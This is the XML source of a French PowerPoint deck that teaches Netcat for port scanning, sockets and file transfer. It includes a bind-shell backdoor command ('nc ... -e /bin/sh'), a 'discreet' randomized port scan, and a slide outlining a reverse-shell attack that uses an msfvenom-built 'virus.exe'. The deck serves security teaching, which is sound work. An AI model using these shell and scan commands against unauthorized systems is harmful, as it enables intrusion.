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176" r:id="rId3"/>
    <p:sldId id="1022" r:id="rId4"/>
    <p:sldId id="1177" r:id="rId5"/>
    <p:sldId id="1178" r:id="rId6"/>
    <p:sldId id="1179" r:id="rId7"/>
    <p:sldId id="1180" r:id="rId8"/>
    <p:sldId id="1181" r:id="rId9"/>
    <p:sldId id="1182" r:id="rId10"/>
    <p:sldId id="1183" r:id="rId11"/>
    <p:sldId id="1184" r:id="rId12"/>
    <p:sldId id="118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9CD70-B618-FD03-5D8D-E88D69914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FC45FB-590F-2037-36AE-C6F487121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DA755-7E5D-A684-99F9-2D5A83E0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C02-3B0A-4F04-ACE9-24D23CA18F3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E2C08-85A2-D5DD-05FD-6DC9A2E1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71A9D5-FEC5-498E-112C-D9B2FDA2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4544-3053-4C08-9D51-38318C9D6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4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F8A74-2DC6-88AA-C065-FBDF1876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7DC44E-7FF2-3C28-2F04-CA4B69CE3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1706D8-39E1-CF00-D82D-3CE42B37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C02-3B0A-4F04-ACE9-24D23CA18F3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DFED8C-89F9-093D-29D6-EBC76E1D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EA9B6-C543-A291-2762-A658BA71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4544-3053-4C08-9D51-38318C9D6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63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34E537-D71D-BF61-05A0-78E87192B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AE48C1-40A5-23B2-4388-905A36CE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C596ED-62F9-1753-37E9-56D77F9D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C02-3B0A-4F04-ACE9-24D23CA18F3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DF5F7-CA9B-9375-693D-68A372BB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43BEA0-C527-3CA3-98A1-E55EBFB3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4544-3053-4C08-9D51-38318C9D6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50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6A69E-0C75-103D-6C88-AC16EFBF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B6E89-CDE3-13B4-23AB-C0410744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1D4C68-3369-D74C-A29B-94AD11D8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C02-3B0A-4F04-ACE9-24D23CA18F3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CCF579-9E9A-934A-6D36-9697AB10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50489E-F331-F289-3AF0-7972050C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4544-3053-4C08-9D51-38318C9D6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98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918E3-0BAB-383D-CA93-57C8F39A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82B76-D24B-72E7-4CB2-95085F55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59C72D-26B8-5DBF-BF5F-84356AA6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C02-3B0A-4F04-ACE9-24D23CA18F3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690CCA-2304-FA31-FCD4-8DFEBDAC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899AFE-C885-16A5-9B22-F69CE40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4544-3053-4C08-9D51-38318C9D6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56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C1E35-7585-D1BF-A6C8-EE6EC1AD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358F5-469C-873C-3461-03AF6904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07B41A-1039-DD9E-D232-843A3D687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124330-8E1A-2DDA-93C8-7BEC802E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C02-3B0A-4F04-ACE9-24D23CA18F3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44D264-52C2-74AE-3395-B76A0FCE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36F45D-D8B2-EE2D-E182-00C702B8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4544-3053-4C08-9D51-38318C9D6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84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4A77A-D455-2A00-881B-888A42BC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2234A1-70A3-7E90-30B3-AE143B473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F67E2D-DFA0-E889-6B11-8DD42B2C1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729BC2-4870-4740-9FFB-02CB1A18C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7C3231-928D-1CCC-8190-427323429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CC1AAD-FD65-45F8-E00D-69559B88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C02-3B0A-4F04-ACE9-24D23CA18F3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CDF156-FCD6-AFC8-92E8-FDAE6383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04AAB9-35B2-4E85-40E0-6724A4A9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4544-3053-4C08-9D51-38318C9D6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87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DC615-B11E-64A2-6F0C-AA68873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20E904-4C55-E16A-DD6F-D2025A5C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C02-3B0A-4F04-ACE9-24D23CA18F3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671B12-0420-6A6F-681C-5C80FA19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D73167-CE8F-CC49-DDA4-BCD30082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4544-3053-4C08-9D51-38318C9D6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9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088F13-3078-0205-152F-579D263A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C02-3B0A-4F04-ACE9-24D23CA18F3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1D3609-E9A8-9822-B28D-8BC042A3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65B3B0-D044-7663-EF72-656011A8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4544-3053-4C08-9D51-38318C9D6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84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328EC-7BE8-42ED-9C99-059D2CEF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25779-4156-0D15-8F43-590C8694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A7E30A-6E9B-2160-5C02-AFE61A317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53BEAB-358F-EECB-4C8A-E606ACAC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C02-3B0A-4F04-ACE9-24D23CA18F3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9F6BAC-0EC1-E84C-D977-D965AA73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93656E-51FB-43DF-8596-19382E5F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4544-3053-4C08-9D51-38318C9D6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95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0984D-4ECC-362D-12E8-A063680C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FE2B6E-9B6C-CDC0-F8F3-DB2F87214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CCEA3F-D73E-DA25-9B3E-6C7A32FF2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F3218B-CFBF-DC03-0DA4-723E59DF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C02-3B0A-4F04-ACE9-24D23CA18F3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595885-9E41-3E2D-8830-F3E0497A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C55000-FE10-291C-A43A-2D3E0A62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4544-3053-4C08-9D51-38318C9D6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49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A43ECF-2F08-5104-991B-8701FCB6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6B59AD-E7C8-F09E-785B-BCE919C6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238F5-CBC2-DEAF-AFE4-E465D75A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B6AC02-3B0A-4F04-ACE9-24D23CA18F3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894322-B6B3-EB8B-42B7-727F82BF0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1BD445-B8C3-72C4-9116-BE55FA371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694544-3053-4C08-9D51-38318C9D6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92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6D0469-3718-22CA-4B76-6B2DC5B5F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901E60-85B9-5011-8942-BFE25C9A3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70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D26841A1-BEC6-9886-4DFE-5D5B62248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/>
              <a:t>L’outil Netcat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2869D052-B2AE-FE01-2860-F2D0BE3AE5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TCP scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" altLang="fr-FR"/>
              <a:t>nc -v -n -z -w 2 192.168.1.6 21-1100</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR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29665DF-EABF-987E-7E76-70B5C48D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176464"/>
            <a:ext cx="4572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buChar char="•"/>
              <a:defRPr sz="30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r-FR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[-v]: indicates Verbose mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="14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r-FR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[-n]: indicates numeric-only IP addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="14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r-FR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[-z]: indicates zero -I/O mode [used for scanning]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="14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r-FR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[-w]: indicates timeout for connects and final net reads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67589" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CCD7761-397E-8D67-EC24-3A21DF59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9" y="3400426"/>
            <a:ext cx="44291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6700D8E7-AFC0-3349-04A7-9D9549133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/>
              <a:t>L’outil Netcat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E942-1196-3BD4-3B74-BBABF34B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TCP Delay Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pour faire moins de bruit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>nc -z -v -i 10 192.168.1.6 21-80</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>UDP Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vzu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 192.168.1.6 80-90</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68612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A2276A3-3925-683A-B9DD-E91AB6D6A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1" y="2632076"/>
            <a:ext cx="46767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4B37453-38AE-514D-4A72-C254CFC6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5037138"/>
            <a:ext cx="4533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C6BD29B8-00C6-F860-9405-1F7F3D819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/>
              <a:t>L’outil Netcat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566D85E0-3E53-428B-BD16-A20841526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Reverse TCP Shell Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>Création d’un malware avec msvenom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>Ecoute avec Netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>Exécution du malware sur windows</a:t>
            </a:r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2107B5E3-E2D6-2037-F602-1E35459DD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71223"/>
            <a:ext cx="474345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5C92947-D2F5-71C3-F3C5-D5C6E2A2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3328988"/>
            <a:ext cx="332105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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FEE59C-4056-2F5A-51F3-D934400CE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4230688"/>
            <a:ext cx="2736850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TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532CC104-2789-3F19-DB2A-BD2110031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9" y="3032126"/>
            <a:ext cx="2162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buChar char="•"/>
              <a:defRPr sz="30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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exécution du virus.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69640" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EABB6FF-883B-2886-750D-314282DEE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425" y="6143626"/>
            <a:ext cx="393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buChar char="•"/>
              <a:defRPr sz="30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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Création du virus.exe et écoute avec Netcat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B1F7E8F-4AD6-05B3-BBA6-AA6C26CA1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/>
              <a:t>Quelques exemples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65E019E7-2460-3A3B-F0E6-39EBB64CD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Pour commencer…quelques tests avec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" dirty="0"/>
              <a:t>L’outil Hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" dirty="0"/>
              <a:t>L’outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" alt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re 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391D2315-B722-3CCC-F978-91213E56E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/>
              <a:t>L’outil Netcat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FF236-92DD-3BDB-785E-A7B1CCD7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90601"/>
            <a:ext cx="8458200" cy="14398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fr-FR" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: abrégé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilitaire permettant d'ouvrir des connexions réseau (UDP ou TCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Appelé le « couteau suisse du TCP/IP »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Permet de scanner les ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60420" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F81357F-C8EF-13B7-A4AF-65476943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2155826"/>
            <a:ext cx="4749800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30CEEF7-9CD0-E9C5-EF93-600790E41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/>
              <a:t>L’outil Netcat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B58D-4056-D112-6134-B45D9B39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90600"/>
            <a:ext cx="8458200" cy="2590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fr-FR" dirty="0"/>
              <a:t>Socket TCP en mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> du port 1337 :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>coté serveur : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -l -p 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Instance de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> client sur le port 1337 :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>coté client : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> localhost 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Chaque phrase taper sur le serveur sera envoyer au client et vice/versa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61444" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28EC3884-49EF-8D1E-0FD1-EA6FC32C5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9" y="3508376"/>
            <a:ext cx="6281737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2306201-25D1-F477-B329-EC19BE8DE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/>
              <a:t>L’outil Netcat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9BDA-0BB0-0276-E84F-690E8EF1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Socket UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On ajoute -u pour la création de notre socket :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -l -u -p 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62468" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BAD5613-27C6-B425-785D-04DF11B74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2" y="3429000"/>
            <a:ext cx="42576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1FDFA9EF-0BD1-EA3D-C989-379D885B0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/>
              <a:t>L’outil Netcat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FD9A52C3-7F4D-9E9B-D03B-D1B51576B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Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>coté serveur : nc -l -p 99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>envoi de données d'un fichier à partir du client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>coté client : cat titi.txt | nc locahost 99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63492" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C78DF1B8-5C59-4DA7-CF3A-8F0BC43D1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3429001"/>
            <a:ext cx="59626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07988986-04D6-32EF-CBA1-D7F7643E2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/>
              <a:t>L’outil Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/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81B42163-EDB1-C11C-D9A2-2F507E53A9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Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>Prenons un fichier tata.txt et redirigeons le vers notre client :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>coté serveur : nc -l -p 1337 &lt; tata.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>coté client : nc locahost 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64516" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FC5E4A-C80E-13B9-AEEC-14107736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1" y="3841750"/>
            <a:ext cx="57435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BADAD6AB-FDC4-26DF-2AB7-7D64A192E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/>
              <a:t>L’outil Netcat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FCC70E7A-E29C-CC1F-3E9C-D3AE5CC23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Backdoor : rediriger les entrées et sorties d’un programme vers le socket. :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>Sur le serveur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>nc -vv -l -p 1337 -e '/bin/sh' -t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>--t permet de négocier une session telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>Sur le client en Telnet  :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:t>telnet IP_SERV 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65540" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C42501-F9C7-F2C4-10CA-0032DDB4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4252914"/>
            <a:ext cx="60388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3E81362B-6314-CEE0-0343-8AE39B02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/>
              <a:t>L’outil Netcat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4FBD-A107-977A-88EE-BB3ADCF1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Comme un scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Scan discret </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l’option -r permet de scanner les ports aléatoirement. Par contre, dès que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> trouve un port ouvert, il arrête son scan. Pour ne pas s’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>arreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> =&gt; l’option -z. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Durée du scan : -i suivie du délai souhaité, en ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -i 30 -r -z IP_SERV 21 23 80-160 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Scan simple ave des détails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66564" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9002F5-B405-9E9D-3F05-6F1A55E67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5019676"/>
            <a:ext cx="396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8D452BAFB8ED42ABC8126835C3F547" ma:contentTypeVersion="11" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="4795fb58b254509285914090dfe0ad51">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="766e261a-0364-4f22-a87c-bb1ba8a18389" xmlns:ns3="8809df66-654d-4558-95ed-9419bae7ad50" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="599bdd61ba10b47222ffd1a270a1c964" ns2:_="" ns3:_="">
    <xsd:import namespace="766e261a-0364-4f22-a87c-bb1ba8a18389"/>
    <xsd:import namespace="8809df66-654d-4558-95ed-9419bae7ad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e261a-0364-4f22-a87c-bb1ba8a18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b972a7f-0ff5-4d06-af94-aff851ef5c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9df66-654d-4558-95ed-9419bae7ad5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e7cec02-6323-426e-83cb-e7abffb8290f}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="8809df66-654d-4558-95ed-9419bae7ad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66e261a-0364-4f22-a87c-bb1ba8a18389">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="8809df66-654d-4558-95ed-9419bae7ad50" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{64B96E98-88E5-404B-BCC7-BE5CD79778B0}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{11827DBA-5331-4C1F-A632-3A5BB60CCDF5}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{85D0A3F0-DAB4-4220-B695-94ACD598849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Grand écran</PresentationFormat>
  <Paragraphs>66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Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Quelques exemples</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat</vt:lpstr>
      <vt:lpstr>L’outil Netcat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KAROUIT Abdelillah</dc:creator>
  <cp:lastModifiedBy>KAROUIT Abdelillah</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-07T09:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-07T09:46:19Z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0x0101002B8D452BAFB8ED42ABC8126835C3F547</vt:lpwstr>
  </property>
</Properties>
</file>